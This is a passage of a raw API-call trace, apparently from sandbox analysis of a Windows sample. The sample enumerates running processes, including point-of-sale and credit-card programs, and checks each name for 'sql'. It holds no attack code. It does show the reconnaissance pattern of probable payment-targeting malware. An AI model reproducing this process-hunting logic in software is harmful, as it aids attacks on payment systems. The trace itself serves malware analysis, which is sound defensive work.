out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0176.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.795] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3585108 [0176.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3585108, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0176.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0176.795] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0176.795] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0176.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.796] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585198 [0176.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3585198, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0176.796] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0176.797] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0176.797] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0176.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0176.798] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35853a8 [0176.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35853a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0176.798] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0176.798] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0176.798] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0176.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0176.799] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x35957e8 [0176.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x35957e8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0176.799] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0176.800] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0176.800] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0176.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0176.801] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35958e8 [0176.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35958e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0176.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0176.801] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0176.801] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0176.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.802] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585270 [0176.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3585270, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0176.802] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0176.802] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0176.802] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0176.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.804] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3585300 [0176.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3585300, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0176.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0176.804] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0176.804] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0176.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.805] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585348 [0176.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3585348, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0176.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0176.805] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0176.805] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0176.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.807] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595828 [0176.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3595828, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0176.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0176.807] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0176.807] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0176.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.808] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585288 [0176.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3585288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0176.809] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0176.809] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0176.809] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0176.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.810] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585138 [0176.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3585138, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0176.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0176.810] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0176.810] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0176.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.811] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x35959e8 [0176.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x35959e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0176.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0176.812] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0176.812] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0176.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.813] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35853c0 [0176.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35853c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0176.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0176.813] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0176.813] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0176.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.814] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35852d0 [0176.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35852d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0176.814] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0176.814] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0176.815] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0176.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.816] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3585120 [0176.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3585120, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0176.816] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0176.816] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0176.816] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0176.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.817] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35852e8 [0176.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35852e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0176.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0176.817] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0176.817] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0176.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.819] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3585168 [0176.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3585168, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0176.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0176.819] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0176.819] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.820] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585570 [0176.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3585570, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0176.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0176.820] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0176.820] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.822] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35855d0 [0176.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35855d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.822] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.822] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0176.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.823] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585450 [0176.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0176.823] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0176.823] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.824] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585420 [0176.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3585420, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0176.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0176.825] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0176.825] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0176.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.826] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585690 [0176.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3585690, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0176.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0176.826] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0176.826] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0176.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0176.827] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x35956a8 [0176.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x35956a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0176.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0176.828] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0176.828] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, 